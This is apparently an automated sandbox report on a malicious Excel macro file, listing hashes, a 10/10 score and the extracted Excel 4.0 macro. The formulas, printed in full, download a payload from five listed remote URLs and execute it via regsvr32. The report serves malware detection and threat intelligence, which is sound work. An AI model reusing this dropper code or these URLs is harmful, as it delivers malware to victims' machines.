Overview

overview

10

Static

static

10

7c3ae9b766...f.xlsm

windows7-x64

10

7c3ae9b766...f.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    7c3ae9b766871bfb38e9aa1d452ceeaa2b8425e7a4af37312bd0c97582813f3f

  • Size

    95KB

  • Sample

    241120-jknebsykgr

  • MD5

    d29f4b7b1e638b8c8640c920a748b7e1

  • SHA1

    ecc49d9a3750d5efc1ae74a4504aee5b9fe4b987

  • SHA256

    7c3ae9b766871bfb38e9aa1d452ceeaa2b8425e7a4af37312bd0c97582813f3f

  • SHA512

    8cc3d965d2be3e8a4fd0714608c18bc0b198adca8473b301e378ba34a48bc7ab83fccc8461c86fc76ab51d8b4cada082aed47a8819c1055559df8a09e3d353ca

  • SSDEEP

    1536:5+nXm5MB5Dg8cVoioFh+fYFl69oXiZ5bcvJlqGiwIWx1BcVXzAyVZF:543DsVhonV69o2bchgGaWBcpASF

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://gavalisangh.astravit.com/umar-rack/fyMw4DZw1JAB/

http://spanish.swslawfirm.com/wp-admin/llSlMYOLL/

https://wowssipworld.com/wp-snapshots/7EzFXGUC3p0ffli/

https://lucacerullo.com/wp-admin/sZ7Sw/

http://198.50.143.158/cgi-bin/PsABe8gznY/
Attributes
  • formulas

    =FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gavalisangh.astravit.com/umar-rack/fyMw4DZw1JAB/","..\wo1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://spanish.swslawfirm.com/wp-admin/llSlMYOLL/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wowssipworld.com/wp-snapshots/7EzFXGUC3p0ffli/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lucacerullo.com/wp-admin/sZ7Sw/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://198.50.143.158/cgi-bin/PsABe8gznY/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\wo1.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://gavalisangh.astravit.com/umar-rack/fyMw4DZw1JAB/
xlm40.dropper

http://spanish.swslawfirm.com/wp-admin/llSlMYOLL/
xlm40.dropper

https://wowssipworld.com/wp-snapshots/7EzFXGUC3p0ffli/
xlm40.dropper

https://lucacerullo.com/wp-admin/sZ7Sw/
xlm40.dropper

http://198.50.143.158/cgi-bin/PsABe8gznY/

Targets

    • Target

      7c3ae9b766871bfb38e9aa1d452ceeaa2b8425e7a4af37312bd0c97582813f3f

    • Size

      95KB

    • MD5

      d29f4b7b1e638b8c8640c920a748b7e1

    • SHA1

      ecc49d9a3750d5efc1ae74a4504aee5b9fe4b987

    • SHA256

      7c3ae9b766871bfb38e9aa1d452ceeaa2b8425e7a4af37312bd0c97582813f3f

    • SHA512

      8cc3d965d2be3e8a4fd0714608c18bc0b198adca8473b301e378ba34a48bc7ab83fccc8461c86fc76ab51d8b4cada082aed47a8819c1055559df8a09e3d353ca

    • SSDEEP

      1536:5+nXm5MB5Dg8cVoioFh+fYFl69oXiZ5bcvJlqGiwIWx1BcVXzAyVZF:543DsVhonV69o2bchgGaWBcpASF

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks